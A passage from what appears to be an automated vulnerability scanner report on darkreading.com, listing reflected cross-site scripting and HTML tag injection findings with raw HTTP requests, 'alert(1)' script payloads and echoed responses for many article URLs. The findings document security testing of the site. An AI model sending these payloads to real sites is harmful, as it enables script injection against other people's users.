GET /security/article/224600304/index.html91419"><a>1b75f9d5df4 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224600304%2Findex.html91419%22%3E%3Ca%3E1b75f9d5df4&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224600304/index.html91419"><a>1b75f9d5df4"> ...[SNIP]...
3.523. http://www.darkreading.com/security/article/224600304/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224600304/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae33"><script>alert(1)</script>883af8c2c20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224600304/index.html?2ae33"><script>alert(1)</script>883af8c2c20=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3a67"><a>15ae743f0a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleb3a67"><a>15ae743f0a0/224700541/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22199"><a>74df5925f00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22470054122199"><a>74df5925f00/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 921b8'><a>dd2f04f9437 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224700541/index.html921b8'><a>dd2f04f9437 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5231b"><a>3399620edf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224700541/index.html5231b"><a>3399620edf HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>New IM Wo ...[SNIP]... 2F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224700541%2Findex.html5231b%22%3E%3Ca%3E3399620edf&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224700541/index.html5231b"><a>3399620edf"> ...[SNIP]...
3.528. http://www.darkreading.com/security/article/224700541/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224700541/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a17bd"><script>alert(1)</script>fcb1d0ab009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224700541/index.html?a17bd"><script>alert(1)</script>fcb1d0ab009=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>New IM Wo ...[SNIP]... icle%2F224700541%2Findex.html%3Fa17bd%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efcb1d0ab009%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224700541/index.html?a17bd"><script>alert(1)</script>fcb1d0ab009=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6813a"><a>bab993be2c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article6813a"><a>bab993be2c8/224900081/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429e3"><a>e42670a8d27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/224900081429e3"><a>e42670a8d27/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a61c4'><a>32bd54ef1c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224900081/index.htmla61c4'><a>32bd54ef1c8 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64f2"><a>9f3f736b188 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224900081/index.htmld64f2"><a>9f3f736b188 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Five Ways ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224900081%2Findex.htmld64f2%22%3E%3Ca%3E9f3f736b188&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224900081/index.htmld64f2"><a>9f3f736b188"> ...[SNIP]...
3.533. http://www.darkreading.com/security/article/224900081/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224900081/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25562"><script>alert(1)</script>0fd12523002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224900081/index.html?25562"><script>alert(1)</script>0fd12523002=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40613"><a>f82c50f191f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article40613"><a>f82c50f191f/225200571/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ff10"><a>8be0a123dd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2252005711ff10"><a>8be0a123dd3/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3dcbf'><a>4f0bb9c1a70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225200571/index.html3dcbf'><a>4f0bb9c1a70 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45647"><a>519524b598b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225200571/index.html45647"><a>519524b598b HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225200571%2Findex.html45647%22%3E%3Ca%3E519524b598b&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225200571/index.html45647"><a>519524b598b"> ...[SNIP]...
3.538. http://www.darkreading.com/security/article/225200571/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/225200571/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8c99"><script>alert(1)</script>217d77e3421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225200571/index.html?c8c99"><script>alert(1)</script>217d77e3421=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de0f"><a>4cf80fb700 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article1de0f"><a>4cf80fb700/225600438/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdf69"><a>1c3d753006e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/225600438bdf69"><a>1c3d753006e/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec954'><a>0fefaa2c2a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225600438/index.htmlec954'><a>0fefaa2c2a7 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ae6"><a>de34f9945a3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225600438/index.html83ae6"><a>de34f9945a3 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F225600438%2Findex.html83ae6%22%3E%3Ca%3Ede34f9945a3&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/225600438/index.html83ae6"><a>de34f9945a3"> ...[SNIP]...
3.543. http://www.darkreading.com/security/article/225600438/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/225600438/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6898a"><script>alert(1)</script>68e7edb99c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225600438/index.html?6898a"><script>alert(1)</script>68e7edb99c0=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc8f"><a>7c105799de9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article7dc8f"><a>7c105799de9/225700088/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d18"><a>28365ea71af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22570008894d18"><a>28365ea71af/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd62"><a>588ac057524 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225700088/index.html5cd62"><a>588ac057524 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e74f'><a>17972439907 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225700088/index.html6e74f'><a>17972439907 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Kaminsky ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/225700088/index.html6e74f'><a>17972439907'> ...[SNIP]...
3.548. http://www.darkreading.com/security/article/225700088/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/225700088/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6100"><script>alert(1)</script>e07bbab2b75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/225700088/index.html?c6100"><script>alert(1)</script>e07bbab2b75=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81602"><a>4ed896ecbdf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article81602"><a>4ed896ecbdf/225701534/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52daf"><a>ef75e0c2389 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22570153452daf"><a>ef75e0c2389/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe9ac"><a>dc496566411 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/225701534/index.htmlfe9ac"><a>dc496566411 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
